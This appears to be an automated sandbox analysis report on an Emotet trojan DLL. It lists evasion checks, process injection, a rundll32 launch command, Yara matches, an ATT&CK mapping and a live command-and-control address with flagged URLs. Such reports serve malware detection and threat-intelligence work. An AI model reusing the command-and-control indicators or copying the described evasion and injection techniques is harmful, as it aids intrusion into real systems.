                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 2240Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 3160Thread sleep time: -120000s >= -30000s
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                      Source: C:\Windows\System32\loaddll64.exeAPI coverage: 7.1 %
                      Source: C:\Windows\System32\regsvr32.exeAPI coverage: 7.4 %
                      Source: C:\Windows\System32\loaddll64.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800427CC _invalid_parameter_noinfo,_invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00000001800427CC
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800427CC _invalid_parameter_noinfo,_invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00000001800427CC
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180042F88 FindFirstFileExW,0_2_0000000180042F88
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180043464 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_0000000180043464
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800427CC _invalid_parameter_noinfo,_invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00000001800427CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800427CC _invalid_parameter_noinfo,_invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00000001800427CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180042F88 FindFirstFileExW,2_2_0000000180042F88
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180043464 FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_0000000180043464
                      Source: C:\Windows\System32\regsvr32.exeCode function: 12_2_0287C9F0 FindFirstFileW,FindNextFileW,12_2_0287C9F0
                      Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: svchost.exe, 00000016.00000002.883963436.00000227B5063000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.739954619.000001475FCF3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @Hyper-V RAW
                      Source: regsvr32.exe, 0000000C.00000003.792566060.0000000000EE3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000003.792402869.0000000000EB2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.882736405.0000000000EB2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.882901644.0000000000EE3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.882944619.00000227AF829000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000002.883925272.00000227B504C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.739774338.000001475FC66000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.739198935.000001475FC64000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.739932682.000001475FCE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: svchost.exe, 0000000E.00000002.882587569.0000023C76802000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
                      Source: regsvr32.exe, 0000000C.00000003.792566060.0000000000EE3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.882901644.0000000000EE3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWj
                      Source: loaddll64.exe, 00000000.00000002.488486061.0000019428C98000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: svchost.exe, 0000000E.00000002.882727598.0000023C76828000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001360C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_000000018001360C
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180048198 GetProcessHeap,0_2_0000000180048198
                      Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180002F14 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0000000180002F14
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018001360C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_000000018001360C
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_000000018000386C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_000000018000386C
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180003A54 SetUnhandledExceptionFilter,0_2_0000000180003A54
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180002F14 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0000000180002F14
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001360C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_000000018001360C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018000386C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_000000018000386C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180003A54 SetUnhandledExceptionFilter,2_2_0000000180003A54

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 174.138.33.49 7080Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\MIpuuSiSZ4.dll",#1Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 484 -p 6160 -ip 6160Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 516 -p 3896 -ip 3896Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6160 -s 336Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3896 -s 328Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\loaddll64.exeCode function: EnumSystemLocalesW,0_2_000000018004C150
                      Source: C:\Windows\System32\loaddll64.exeCode function: EnumSystemLocalesW,0_2_000000018004C1D4
                      Source: C:\Windows\System32\loaddll64.exeCode function: EnumSystemLocalesW,0_2_000000018004C2A4
                      Source: C:\Windows\System32\loaddll64.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_000000018004C364
                      Source: C:\Windows\System32\loaddll64.exeCode function: GetLocaleInfoW,0_2_000000018004C5B0
                      Source: C:\Windows\System32\loaddll64.exeCode function: EnumSystemLocalesW,0_2_0000000180046664
                      Source: C:\Windows\System32\loaddll64.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_000000018004C708
                      Source: C:\Windows\System32\loaddll64.exeCode function: EnumSystemLocalesW,0_2_0000000180046788
                      Source: C:\Windows\System32\loaddll64.exeCode function: GetLocaleInfoW,0_2_000000018004C7DC
                      Source: C:\Windows\System32\loaddll64.exeCode function: EnumSystemLocalesW,0_2_0000000180046810
                      Source: C:\Windows\System32\loaddll64.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_000000018004C908
                      Source: C:\Windows\System32\loaddll64.exeCode function: GetLocaleInfoW,0_2_00000001800475F0
                      Source: C:\Windows\System32\loaddll64.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,0_2_000000018004BE04
                      Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesW,2_2_000000018004C150
                      Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesW,2_2_000000018004C1D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesW,2_2_000000018004C2A4
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,2_2_000000018004C364
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,2_2_000000018004C5B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesW,2_2_0000000180046664
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_000000018004C708
                      Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesW,2_2_0000000180046788
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,2_2_000000018004C7DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesW,2_2_0000000180046810
                      Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,2_2_000000018004C908
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,2_2_00000001800475F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,2_2_000000018004BE04
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_0000000180059100 cpuid 0_2_0000000180059100
                      Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00000001800032C0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00000001800032C0

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 0000000C.00000002.882519844.0000000000E78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 3.2.rundll32.exe.1a6c08b0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.195c5870000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.rundll32.exe.1a6c08b0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.rundll32.exe.21313760000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.regsvr32.exe.1000000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.21313760000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.1a6c08b0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll64.exe.1942a5d0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.rundll32.exe.21313760000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.16a80010000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.16a80010000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.rundll32.exe.21313760000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.rundll32.exe.1a6c08b0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.195c5870000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.rundll32.exe.1a6c08b0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.regsvr32.exe.1000000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.13b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.rundll32.exe.1a6c08b0000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll64.exe.1942a5d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.13b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.21313760000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.rundll32.exe.21313760000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000000.457523835.000001A6C0911000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.454942955.0000000001411000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.460329273.0000016A80010000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.500443188.000001A6C0911000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.883306468.0000000001000000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.503233757.0000021313901000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.460399040.0000016A80071000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.883481925.0000000002861000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.499993940.000001A6C08B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000000.458204040.0000021313901000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.468293754.00000195C58D1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000000.457983091.0000021313760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.457466014.000001A6C08B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.454887422.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.448855621.000001A6C0911000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000000.454361313.0000021313901000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000000.448792384.000001A6C08B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.468234789.00000195C5870000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000000.454167344.0000021313760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.503043476.0000021313760000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.488528971.000001942A5D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation1
                      DLL Side-Loading
                      111
                      Process Injection
                      2
                      Masquerading
                      OS Credential Dumping1
                      System Time Discovery
                      Remote Services1
                      Archive Collected Data
                      Exfiltration Over Other Network Medium1
                      Encrypted Channel
                      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                      DLL Side-Loading
                      3
                      Virtualization/Sandbox Evasion
                      LSASS Memory41
                      Security Software Discovery
                      Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
                      Non-Standard Port
                      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)111
                      Process Injection
                      Security Account Manager3
                      Virtualization/Sandbox Evasion
                      SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                      Application Layer Protocol
                      Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                      Deobfuscate/Decode Files or Information
                      NTDS2
                      Process Discovery
                      Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                      Hidden Files and Directories
                      LSA Secrets1
                      Remote System Discovery
                      SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.common2
                      Obfuscated Files or Information
                      Cached Domain Credentials2
                      File and Directory Discovery
                      VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                      Regsvr32
                      DCSync44
                      System Information Discovery
                      Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                      Rundll32
                      Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                      DLL Side-Loading
                      /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
                      File Deletion
                      Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 671702 Sample: MIpuuSiSZ4 Startdate: 22/07/2022 Architecture: WINDOWS Score: 96 44 200.6.0.0 UninetSAdeCVMX Ecuador 2->44 46 108.7.0.0 UUNETUS United States 2->46 48 23 other IPs or domains 2->48 56 Snort IDS alert for network traffic 2->56 58 Antivirus detection for URL or domain 2->58 60 Multi AV Scanner detection for submitted file 2->60 62 3 other signatures 2->62 9 loaddll64.exe 3 2->9         started        12 svchost.exe 8 2->12         started        14 svchost.exe 9 1 2->14         started        17 5 other processes 2->17 signatures3 process4 dnsIp5 66 Hides that the sample has been downloaded from the Internet (zone.identifier) 9->66 19 regsvr32.exe 5 9->19         started        22 cmd.exe 1 9->22         started        24 rundll32.exe 9->24         started        30 3 other processes 9->30 26 WerFault.exe 12->26         started        28 WerFault.exe 12->28         started        50 127.0.0.1 unknown unknown 14->50 52 192.168.2.1 unknown unknown 17->52 signatures6 process7 signatures8 64 Hides that the sample has been downloaded from the Internet (zone.identifier) 19->64 32 regsvr32.exe 19->32         started        36 rundll32.exe 22->36         started        38 WerFault.exe 9 24->38         started        process9 dnsIp10 42 174.138.33.49, 49794, 7080 DIGITALOCEAN-ASNUS United States 32->42 54 System process connects to network (likely due to code injection or exploit) 32->54 40 WerFault.exe 20 9 36->40         started        signatures11 process12

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      MIpuuSiSZ4.dll72%VirustotalBrowse
                      MIpuuSiSZ4.dll54%MetadefenderBrowse
                      MIpuuSiSZ4.dll88%ReversingLabsWin64.Trojan.Emotet
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      https://174.138.33.49/7100%Avira URL Cloudmalware
                      https://www.disneyplus.com/legal/your-california-privacy-rights0%URL Reputationsafe
                      https://www.disneyplus.com/legal/privacy-policy0%URL Reputationsafe
                      https://174.138.33.49:7080/0%URL Reputationsafe
                      https://174.138.33.49:7080/temy100%Avira URL Cloudmalware
                      https://www.pango.co/privacy0%URL Reputationsafe
                      https://disneyplus.com/legal.0%URL Reputationsafe
                      http://crl.ver)0%Avira URL Cloudsafe
                      https://174.138.33.49:7080/Numv100%Avira URL Cloudmalware
                      https://www.tiktok.com/legal/report/feedback0%URL Reputationsafe
                      http://help.disneyplus.com.0%URL Reputationsafe
                      https://174.138.33.49/0%URL Reputationsafe
                      No contacted domains info
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://174.138.33.49/7regsvr32.exe, 0000000C.00000003.792402869.0000000000EB2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.882736405.0000000000EB2000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: malware
                      unknown
                      https://www.disneyplus.com/legal/your-california-privacy-rightssvchost.exe, 0000001E.00000003.714545443.00000147607A0000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://www.disneyplus.com/legal/privacy-policysvchost.exe, 0000001E.00000003.714545443.00000147607A0000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://schemas.xmlsoap.org/ws/2004/08/addressingsvchost.exe, 00000016.00000002.883340069.00000227AF8AC000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://174.138.33.49:7080/regsvr32.exe, 0000000C.00000003.792402869.0000000000EB2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.882736405.0000000000EB2000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://www.hotspotshield.com/terms/svchost.exe, 0000001E.00000003.710986823.0000014760C19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.710810502.0000014760C02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.710861874.0000014760C03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.710944641.00000147607AD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.710923120.000001476079C000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://174.138.33.49:7080/temyregsvr32.exe, 0000000C.00000003.792402869.0000000000EB2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000C.00000002.882736405.0000000000EB2000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          unknown
                          https://www.pango.co/privacysvchost.exe, 0000001E.00000003.710986823.0000014760C19000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.710810502.0000014760C02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.710861874.0000014760C03000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.710944641.00000147607AD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000003.710923120.000001476079C000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://disneyplus.com/legal.svchost.exe, 0000001E.00000003.714545443.00000147607A0000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://crl.ver)svchost.exe, 00000016.00000002.883963436.00000227B5063000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.739932682.000001475FCE0000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          low
